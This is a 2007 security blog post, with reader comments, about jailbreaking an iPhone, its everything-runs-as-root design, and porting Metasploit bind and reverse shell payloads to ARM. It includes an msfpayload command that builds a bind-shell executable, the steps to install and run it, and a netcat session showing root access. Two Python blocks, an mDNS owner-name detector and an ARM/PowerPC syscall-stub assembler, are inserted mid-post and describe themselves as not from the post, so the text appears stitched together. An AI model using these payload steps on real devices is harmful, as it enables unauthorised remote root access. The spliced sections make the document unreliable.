Tuesday, September 25, 2007

A root shell in my pocket (and maybe yours)

After the recent price drop and toolchain release, I bit the bullet and bought a shiny new iPhone. The first thing I did was bypass activation, run jailbreak, and install the AppTapp Installer. Using the installer, I added OpenSSH and a VT-100 Terminal to the phone. Once I had shell access, I made a few observations:

1) The processor is actually decent. Compare the iPhone (400MHz*) with the Nokia n770 (233MHz) or the Nokia n800 (320MHz) and the choice of a handheld hacking device is a no-brainer. The (mostly) working toolchain, large amount of storage (8GB), and ease of use make this a great candidate for almost any security researcher "on-the-go". If you tweak the networking preferences file, you can set the signal quality limit down to "1", turning the "join a WiFi network" screen into a primitive stumbler (or just install Stumbler via AppTapp).

* The media widely reported the processor speed as 620MHz and I repeated it here. Dan Moniz suggested I check the output of ioreg for the actual CPU speed, which is reported as 400MHz (ioreg shows the little-endian byte string 0084d717, which is 0x17d78400 == 400000000).

2) EDGE network access is horribly slow, but it works. The downside is that the EDGE network provides the phone with a private address, on a point-to-point link, that is three hops away from a public IP range. For example, my phone's EDGE address is 10.x.x.x, its first hop is 172.16.x.x, its second hop is 10.x.x.x, and its third hop is also 10.x.x.x. The fourth hop is a 200.x.x.x address. Latency is between 180ms and 600ms, but averages around 200ms-250ms. I made a few attempts to discover other hosts in the private address space, in hopes of finding other EDGE devices, but instead only found a few scattered routers, switches, and servers.

The phone has been a fun time sink. I used the MobileSafari PDF viewer to read all of the recent Uninformed Journal articles. Metasploit 2 runs decently, even though the Terminal isn't the best interface for a screen of this size. Metasploit 3 should run, as soon as the toolchain is capable of building a working Ruby interpreter (yes, there is a Ruby package in AppTapp; yes, it's totally broken). When that day comes, I hope the EDGE network can handle it :-)

Having a network-enabled root shell in my pocket is great, but being able to pop a root shell on someone else's iPhone is even better. A few things to keep in mind:

1) Every process runs as root. MobileSafari, MobileMail, even the Calculator, all run with full root privileges. Any security flaw in any iPhone application can lead to a complete system compromise. A rootkit takes on a whole new meaning when the attacker has access to the camera, microphone, contact list, and phone hardware. Couple this with "always-on" internet access over EDGE and you have a perfect spying device.

2) The mDNSResponder service runs by default. This service is also known by the names Bonjour, ZeroConf, and Rendezvous. When the iPhone is first synced with iTunes, the hostname is changed. The default hostname becomes "User's iPhone", where "User" is the Mac OS X user account used to perform the sync. If the iPhone is connected to a WiFi network, the mDNS service will advertise itself on the local network, exposing the user name of the iPhone's owner. So far, it doesn't look like the mDNS service responds to normal probes, so at least active discovery is less likely (maybe the sysctl parameter net.inet.udp.no_5353=1 has something to do with it).

3) The MobileMail application supports Microsoft Office document formats. It does this by using the OfficeImporter framework to convert these documents into a viewable form. This looks like a great target for file-format fuzzing and some late night reverse engineering.

4) Independent Security Evaluators demonstrated a code-execution vulnerability in the iPhone at Black Hat 2007. Their slides describe the exploit and shellcode development process. Since then, the toolchain and the amount of public information have improved considerably.
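Item 2 above is the one a network owner can actually check for. As an added, defender-side example (my own code, not from this post and not part of any Apple or Metasploit tooling), here is a minimal parser for mDNS response packets that extracts every record owner name and PTR target and flags names matching the default "<User>'s iPhone" pattern, so you can run it over mDNS responses captured on your own network and see which devices are advertising an owner's account name. The sample packet is constructed inline; the sanitized `.local` hostname form `Users-iPhone`, the `_apple-mobdev._tcp` service type and the address 192.0.2.25 are assumptions, not values taken from the post.

```python
import re
import struct

# Default-name pattern from the post: "User's iPhone" as a service instance name, and
# (assumed, not from the post) "Users-iPhone" as the sanitized .local hostname.
DEFAULT_IPHONE_NAME = re.compile(r"^(?P<user>.+?)(?:'s iPhone|s-iPhone)(?:\.|$)")


def read_name(msg, offset):
    """Decode a DNS name starting at offset, following RFC 1035 compression pointers.
    Returns (dotted_name, offset_of_next_field)."""
    labels = []
    end = None              # position after the name in the original (un-jumped) stream
    hops = 0
    while True:
        if offset >= len(msg):
            raise ValueError("truncated name")
        length = msg[offset]
        if (length & 0xC0) == 0xC0:            # compression pointer: 11xxxxxx xxxxxxxx
            if offset + 2 > len(msg):
                raise ValueError("truncated pointer")
            pointer = struct.unpack_from("!H", msg, offset)[0] & 0x3FFF
            if end is None:
                end = offset + 2
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            offset = pointer
            continue
        offset += 1
        if length == 0:                        # root label terminates the name
            break
        if offset + length > len(msg):
            raise ValueError("truncated label")
        labels.append(msg[offset:offset + length].decode("utf-8", "replace"))
        offset += length
    return ".".join(labels), (offset if end is None else end)


def parse_mdns_records(msg):
    """Return [(owner_name, rtype, ptr_target_or_None)] for every answer/authority/additional record."""
    if len(msg) < 12:
        raise ValueError("short DNS header")
    qdcount, ancount, nscount, arcount = struct.unpack_from("!HHHH", msg, 4)
    offset = 12
    for _ in range(qdcount):                   # skip the question section
        _, offset = read_name(msg, offset)
        offset += 4                            # QTYPE + QCLASS
    records = []
    for _ in range(ancount + nscount + arcount):
        name, offset = read_name(msg, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", msg, offset)
        offset += 10
        if offset + rdlen > len(msg):
            raise ValueError("truncated RDATA")
        target = None
        if rtype == 12:                        # PTR: RDATA is itself a (possibly compressed) name
            target, _ = read_name(msg, offset)
        records.append((name, rtype, target))
        offset += rdlen
    return records


def find_default_iphone_names(msg):
    """List (user, advertised_name) for every name that matches the default iPhone pattern."""
    hits = []
    for name, _rtype, target in parse_mdns_records(msg):
        for candidate in (name, target):
            match = DEFAULT_IPHONE_NAME.match(candidate) if candidate else None
            if match:
                hits.append((match.group("user"), candidate))
    return hits


# ---- constructed sample: one mDNS response carrying an A record and a PTR record ----
def _label(text):
    return bytes([len(text)]) + text.encode()

_header = struct.pack("!HHHHHH", 0, 0x8400, 0, 2, 0, 0)          # response flag, 2 answers
_host = _label("Bobs-iPhone") + _label("local") + b"\x00"
_rec1 = _host + struct.pack("!HHIH", 1, 0x8001, 120, 4) + bytes([192, 0, 2, 25])
_local_off = len(_header) + 1 + len("Bobs-iPhone")                # offset of the "local" label
_svc_off = len(_header) + len(_rec1)                              # offset of the PTR owner name
_svc = _label("_apple-mobdev") + _label("_tcp") + struct.pack("!H", 0xC000 | _local_off)
_ptr_rdata = _label("Bob's iPhone") + struct.pack("!H", 0xC000 | _svc_off)
_rec2 = _svc + struct.pack("!HHIH", 12, 1, 4500, len(_ptr_rdata)) + _ptr_rdata
SAMPLE_RESPONSE = _header + _rec1 + _rec2

if __name__ == "__main__":
    for user, name in find_default_iphone_names(SAMPLE_RESPONSE):
        print("owner name advertised: %r via %s" % (user, name))
```

Feed it the UDP payload of any packet seen on 224.0.0.251:5353; both the A record hostname and the PTR instance name in the sample yield the owner name "Bob", which is exactly what a laptop on the same coffee-shop WiFi would see.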

The first step to iPhone exploits is platform support for the Metasploit Framework. To support a new platform, the architecture must be defined in rex/constants.rb. I added two new architectures, one for ARM little endian (armle), and another for ARM big endian (armbe), since many ARM chips can run in either mode.

The next step is to figure out the payloads. Fortunately, I wrote many of Metasploit's PowerPC modules for Mac OS X. The iPhone uses the same syscall numbers, so porting payloads is straightforward. On Mac OS X PowerPC, the system call number is placed into r0 and the arguments start at register r3. On the iPhone, the system call number is placed into r12 and the arguments start at r0.

For example, the "exit" system call on PowerPC looks like:

li r0, 1 ; SYS_exit
li r3, 255 ; Exit code 255
sc ; System call

By comparison, the same code on the iPhone looks like:

mov r12, #1 ; SYS_exit
mov r0, #255 ; Exit code 255
swi 128 ; System call
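To make the register and byte-order differences concrete, here is an added example (my own code, not part of the original post and not Metasploit's) that assembles the two exit() stubs above from their instruction encodings and emits them in both byte orders, matching the armle and armbe architectures mentioned earlier. The ARM words are the standard MOV-immediate and SWI encodings with condition AL, the PowerPC `li` is `addi rd, 0, simm`, and the syscall number (1 for exit) and the `swi 0x80` trap are as stated above. It also covers the one ARM wrinkle a porter hits immediately: a MOV immediate must be an 8-bit value rotated right by an even amount, so a constant such as 0x101 cannot be loaded with a single MOV.

```python
import struct

SYS_EXIT = 1  # same syscall number on Mac OS X PowerPC and on the iPhone


def arm_rotated_imm(value):
    """Encode value as an ARM 'modified immediate': an 8-bit constant rotated right by 2*rotate.
    Returns the 12-bit field (rotate << 8 | imm8), or raises ValueError if it cannot be encoded."""
    value &= 0xFFFFFFFF
    for rotate in range(16):
        shift = 2 * rotate
        # Rotate left to undo the hardware's rotate-right, then check the result fits in 8 bits
        rotated = ((value << shift) | (value >> (32 - shift))) & 0xFFFFFFFF
        if rotated <= 0xFF:
            return (rotate << 8) | rotated
    raise ValueError("0x%08x is not encodable as an ARM immediate" % value)


def arm_mov_imm(rd, value):
    """MOV rd, #value  (cond=AL, I=1, opcode=MOV, S=0, Rn=0)."""
    return 0xE3A00000 | (rd << 12) | arm_rotated_imm(value)


def arm_swi(imm24):
    """SWI #imm24  (cond=AL)."""
    return 0xEF000000 | (imm24 & 0xFFFFFF)


def ppc_li(rd, simm):
    """li rd, simm  ==  addi rd, 0, simm  (opcode 14, 16-bit signed immediate)."""
    if not -0x8000 <= simm <= 0x7FFF:
        raise ValueError("%d does not fit a 16-bit signed immediate" % simm)
    return (14 << 26) | (rd << 21) | (simm & 0xFFFF)


PPC_SC = 0x44000002  # 'sc' instruction


def ppc_exit_stub(code):
    """PowerPC: syscall number in r0, first argument in r3, trap with sc."""
    return [ppc_li(0, SYS_EXIT), ppc_li(3, code), PPC_SC]


def arm_exit_stub(code):
    """iPhone ARM: syscall number in r12, first argument in r0, trap with swi 0x80."""
    return [arm_mov_imm(12, SYS_EXIT), arm_mov_imm(0, code), arm_swi(0x80)]


def to_bytes(words, little_endian):
    """Serialize 32-bit instruction words; armle vs armbe differ only here."""
    fmt = "<I" if little_endian else ">I"
    return b"".join(struct.pack(fmt, w) for w in words)


if __name__ == "__main__":
    print("ppc  :", to_bytes(ppc_exit_stub(255), False).hex())
    print("armle:", to_bytes(arm_exit_stub(255), True).hex())
    print("armbe:", to_bytes(arm_exit_stub(255), False).hex())
```

The PowerPC stub is always big-endian; the identical ARM words come out as `01c0a0e3...` for armle and `e3a0c001...` for armbe, which is why the architecture definition needs to carry endianness and not just the instruction set.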

With only a few headaches, I was able to port the bind shell and reverse shell payloads to the iPhone. I added a very simple nop generator to match. At this point, it's possible to generate working iPhone shellcode using the trunk version of Metasploit 3. For kicks, I rewrote Charlie Miller's "vibrate" shellcode (listed in the ISE slides) as well. The Metasploit version is a little bit smaller and uses the correct address for Firmware 1.02. The next step is to finish my XOR (well, EOR on ARM) encoder, and start playing with thumb mode (16-bit instructions). Since shellcode is no fun unless you can do something with it, I added support for iPhone executables to the msfpayload command. This allows you to generate stand-alone bind/reverse shell executables using the following syntax:

$ msfpayload osx/armle/shell_bind_tcp LPORT=4444 X > iphone_bindshell.bin

This binary can be copied to the iPhone using SSH or iPHUC/iPhoneTool and executed.

$ ssh root@192.168.0.125
# chmod +x iphone_bindshell.bin
# ./iphone_bindshell.bin
---
$ nc -vvn 192.168.0.125 4444
(UNKNOWN) [192.168.0.125] 4444 (krb524) open
id
uid=0 euid=1 gid=0(wheel) groups=0(wheel)
uname -a
Darwin Metasploit Developer's iPhone 9.0.0d1
Darwin Kernel Version 9.0.0d1: Fri Jun 22 00:38:56 PDT 2007;
root:xnu-933.0.1.178.obj~1/RELEASE_ARM_S5L8900XRB iPhone1,1 Darwin

Once the XOR encoder is done, the only step left is to find the bugs and write the exploits :-)

15 Comments:

Anonymous Anonymous said...

Nice One :)

7:38:00 AM  
Blogger mokum von Amsterdam said...

Darn smart!
Your contribution will surely help the iPhone dev-team and who knows, even inspire some other smarties to assist in the hunting.
Thanks!

11:32:00 AM  
Anonymous Anonymous said...

you f^cking Rock!!! can't wait to see the versions develop.

2:45:00 PM  
Anonymous Anonymous said...

hd,

got to say it: metasploit rocks

just curious why you were not part of the new syngress metasploit book. do you have something coming out book wise, or is that what the documentation is for? ;)

good stuff

3:08:00 AM  
Blogger hdm said...

Regarding the Syngress book on Metasploit -- we chose not to be part of the project for quite a few reasons. The biggest one is the fact that Metasploit was (and is) a moving target. Syngress wanted to start writing the book while we were transitioning between 2.7 and 3.0. The book they released this week has over half of its content dedicated to an obsolete version of the Framework. Personally, I am not a fan of Syngress's style, quality, editing skills, or marketing abilities. We DO have a community book that is in the works and any help you want to provide would be useful:

http://en.wikibooks.org/wiki/Metasploit

7:00:00 AM  
Anonymous n800_User said...

Actually, n800 is a hacker's choice :)
Of course 330MHz is smaller than 400. Actually in n800 there is a way to use 400 too BUT then the second DSP core should be down-clocked, sort of a trade-off. But 330 MHz is pretty enough to have a bunch of fun. What can n800 do?
- The screen is 800x480. A way better for the web. And for entering text to the terminals :)
- EDGE\3G goes via external device and can be a way better than EDGE.
- Wi-Fi is both fast and consumes very small power in idle mode while keeping link alive.
- Great bluetooth connectivity. Low powered as well and yes, it copes with dozens of connections easily.
- Dozens of tools are ported. Like nmap, kismet, aircrack, curl\wget, ... and much more. Due to official SDK which makes porting just a joke :)
- You can even wardrive using gpsd to learn what and where.
- There is openvpn to get to anywhere. No matter you're using EDGE and lame local IP, etc.
- There is even nginx and php-fastcgi so your server is with you :)
- Bluetooth utils to ... er... to audit these remote devices :)
- Real mc filemanager, sshing to your pocket and dealing with files on device and its cards is a real fun.
- TCPDump allows to know what's going up.
- Some GUI fun. On n800 you can run full-featured Linux apps. Like mplayer to watch let's say .FLV file. Or Pidgin to chat via ICQ, MSN, Jabber. Or maybe xchat to hang on IRC. Or MaemoMapper to navigate via maps like google streets optionally using GPS receiver. Some VNC and RemoteDesktop fun as well. You're ruling your world :-). Decent VoIP features. Including SIP (a whole dozen of operators like Gizmo) and Skype. MythTV is also here. And well, it runs Firefox. To be exact, reduced version of great browser based on Gecko 1.9. Yes, this Gecko is beta which will be used by Firefox 3, but even today it can easily beat any other pocket browser just jokingly (on Ajax-based sites, or YouTube, he-he).
- We can mess with our OS as we wish. If we want to, we can rebuild kernel and other parts like initfs. Allowing device to boot up from cards, have unusual kernel features not available out of the box (like various filesystems support added, or advanced SDHC patches for fast speeds, or whatever else kernel does).

What can n800 not do?
- It can't be a cell phone. Yes. Kinda unique for Nokia. But in exchange you're getting FREEDOM. Device is not locked to any carrier. No strings attached. No restrictions. Nothing crippled. Real Debian Linux inside. You can even apt-get something instead of using app manager, result is same :-). You're getting real unrestricted pocket computer from beginning. iPhone is just a dialer and player by design. So you're hacking to take your rights and Apple can always stop you with updates. We're using our rights. Nokia will not stop us. Because their device was created to be FREE and give you some FREEDOM.

- Yes, n800 can not limit you as well. It's perfectly hackable. You do not have to fight with dumb barriers. You do not have to be afraid of updates. Just have fun :-)

- And yes, n800 can't be such a buzzword. It is rather intended for thinking people while iPhone is a dumb dialer with player targeted on dumb people by design (so it is a way more restrictive without hacking).

Of course you can break'n'enter. But Apple may decide to prevent "homebrew" apps with updates. So this way can be just a headache.

As for me, looks like some people are not seeking the simple way but rather their own. That's good, too. ARM shellcode... users should tremble since there are so many ARM devices today =). Great work! Did I mention ARM asm rocks compared to x86 one? ;)

3:57:00 PM  
Anonymous Anonymous said...

Amazing job HDM.
Having a network-based root shell in my pocket does feel good, especially after reading your blog.

5:05:00 AM  
Blogger Matthew said...

it's people like you who fuck it up for the rest of us....get a life beyond trying endlessly to hack into other people's phones... hey, there is a knock on the door, mom wants her basement back and she wants you to join the human world.
Anarchy is a pain in the ass, you asswipe.
if you have any ego, you will answer to this rather than delete..which i assume you will..

10:20:00 AM  
Blogger hdm said...

Matthew, it's people like you who make this all worthwhile :-)

12:01:00 PM  
Anonymous Anonymous said...

as ceo of apple...i would hire you instantly:)

3:10:00 PM  
Anonymous rd said...

nice work bro :)

I agree with n800_User tho .. n800 is a better choice for a handheld hacking device.

3:48:00 AM  
Anonymous Anonymous said...

I have been thinking about getting an n800 or maybe the n810, or maybe the Asus Eee - but I am coming from my trustworthy zaurus sl-5500 that I have had many years. My problem is, the zaurus is old and maybe a little slower, but it does everything I want it to do with auditing/pen testing....I did get metasploit up to 2.7 to work on it, but could never get 3 to work - lots of info on it at edwiget.name if anyone finds this useful. I never could find any gps + cable or 10/100 ethernet card for it...but wireless works great. I love the zaurus so much, I would love to trick it out with all its options and then just put it away....so if anyone has any stuff for it...contact me.

12:20:00 AM  
Blogger Adam said...

Matthew, did you just throw insults at the legendary HDM? I don't think you even realize what you've just done.

It's actually quite the opposite, it's better a credible person such as HD finds this stuff out so something can be done about it rather than the people who really want to do damage..

3:46:00 PM  
Blogger M@DL0G!K said...

Matthew: ignorance is not safe.
Computers are by design flawed...
they need to know what to run.

And there will always be people who want/need to know what's going on under the hood. And thank God, else you would throw away anything that stops working!

And what about making something work better / make it more capable...

well if it can be done, (like jailbreaking the ipod touch/iphone) then IT SHOULD BE DONE! (ie: Apple, as soon as you heard of installer.app, you should have bought them big time and provided the solution... but that's not getting money in, so f*ck it! .... .
... .... ... money... ... yeah ..

) ... enough said about that!

HD: great article!
I need to know something:
you talk about modifying the "network preference file" to allow for weaker networks to pop up ..
humm .. do you mind doing a tutorial on that ? I couldn't find this info on google ! Thanks!
-Madlogik

2:29:00 PM  
Anonymous Anonymous coward said...

/private/var/preferences/SystemConfiguration/com.apple.wifi.plist

3:32:00 AM  
